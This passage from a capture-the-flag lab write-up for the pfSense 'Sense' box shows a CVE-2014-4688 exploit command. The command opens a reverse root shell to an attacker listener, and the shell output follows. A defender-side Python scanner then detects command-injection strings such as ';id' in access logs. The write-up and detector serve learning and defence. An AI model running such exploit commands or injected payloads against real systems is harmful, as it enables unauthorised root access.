Exploitation


┌──(kali㉿kali)-[~/archive/htb/labs/sense]
└─$ python3 CVE-2014-4688.py --rhost $IP --lhost 10.10.14.5 --lport 9999 --username rohit --password pfsense
CSRF token obtained
Running exploit...
Exploit completed

Executing the exploit

┌──(kali㉿kali)-[~/archive/htb/labs/sense]
└─$ nnc 9999            
listening on [any] 9999 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.60] 13540
sh: can't access tty; job control turned off
# whoami
root
# hostname
pfSense.localdomain
# ifconfig
em0: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> metric 0 mtu 1500
	options=9b<RXCSUM,TXCSUM,VLAN_MTU,VLAN_HWTAGGING,VLAN_HWCSUM>
	ether 00:50:56:b9:b2:f6
	inet 10.10.10.60 netmask 0xffffff00 broadcast 10.10.10.255
	inet6 fe80::250:56ff:feb9:b2f6%em0 prefixlen 64 scopeid 0x1 
	nd6 options=1<PERFORMNUD>
	media: Ethernet autoselect (1000baseT <full-duplex>)
	status: active
plip0: flags=8810<POINTOPOINT,SIMPLEX,MULTICAST> metric 0 mtu 1500
enc0: flags=0<> metric 0 mtu 1536
pfsync0: flags=0<> metric 0 mtu 1460
	syncpeer: 224.0.0.240 maxupd: 128 syncok: 1
lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> metric 0 mtu 16384
	options=3<RXCSUM,TXCSUM>
	inet 127.0.0.1 netmask 0xff000000 
	inet6 ::1 prefixlen 128 
	inet6 fe80::1%lo0 prefixlen 64 scopeid 0x5 
	nd6 options=3<PERFORMNUD,ACCEPT_RTADV>
pflog0: flags=100<PROMISC> metric 0 mtu 33144

Initial foothold established as root by exploiting CVE-2014-4688 in the target's pfSense web application; the reverse shell connects back from 10.10.10.60 to the listener on 10.10.14.5:9999 and drops straight into a root shell.
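As an added, defender-side example that is not part of the original writeup: a small Python scanner that reads web server access log lines and flags requests whose URL-decoded query parameters contain shell metacharacters, the trace a command-injection attempt like the one above leaves in the webConfigurator's access log. The sample log lines, the /graph.php path and the db parameter are constructed for illustration only and are not taken from the target; the nginx "combined" log format is assumed.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines in nginx "combined" format (assumed format).
# The path /graph.php and the db parameter are hypothetical; the lines
# only exist so the scanner has input to run on.
SAMPLE_LOG = """\
10.10.14.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php HTTP/1.1" 200 4312 "-" "Mozilla/5.0"
10.10.14.5 - - [01/Jan/2024:10:00:01 +0000] "GET /graph.php?db=queues&width=600 HTTP/1.1" 200 1822 "-" "Mozilla/5.0"
10.10.14.5 - - [01/Jan/2024:10:00:02 +0000] "GET /graph.php?db=queues%3Bid HTTP/1.1" 200 19 "-" "python-requests/2.31"
10.10.14.5 - - [01/Jan/2024:10:00:03 +0000] "GET /graph.php?db=queues%26%26whoami HTTP/1.1" 200 5 "-" "python-requests/2.31"
"""

# Minimal parser for the combined log format: source address, timestamp,
# method, request target (path plus query string) and status code.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Shell metacharacters that have no business inside a normal query value:
# command separators, pipes, backticks and $( ) command substitution.
META_RE = re.compile(r'[;|`]|\$\(|&&|\|\|')


def suspicious_values(target):
    """Return (parameter, decoded value) pairs that carry shell metacharacters.

    The query string is split on '&' before decoding, so a literal '&'
    that only appears after decoding (%26) is treated as part of a value.
    """
    if '?' not in target:
        return []
    _, _, query = target.partition('?')
    hits = []
    for pair in query.split('&'):
        key, _, value = pair.partition('=')
        decoded = unquote_plus(value)
        if META_RE.search(decoded):
            hits.append((key, decoded))
    return hits


def scan_log(text):
    """Scan access log text and return one alert dict per suspicious request."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed or non-request line, skip it
        hits = suspicious_values(m['target'])
        if hits:
            alerts.append({
                'src': m['src'],
                'ts': m['ts'],
                'path': m['target'].partition('?')[0],
                'params': hits,
            })
    return alerts


if __name__ == '__main__':
    for alert in scan_log(SAMPLE_LOG):
        print(f"{alert['ts']} {alert['src']} {alert['path']} -> {alert['params']}")
```

Splitting the query on `&` before decoding is the important detail: decoding first would turn an encoded `%26` into a separator and hide an injected `&&`. In a real deployment the same check would run against the firewall's own web server log rather than a constructed string, and a hit from an authenticated session on a host that should never run arbitrary commands is worth an immediate look, since, as the shell above shows, the web server on this appliance runs as root.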

System Level Compromise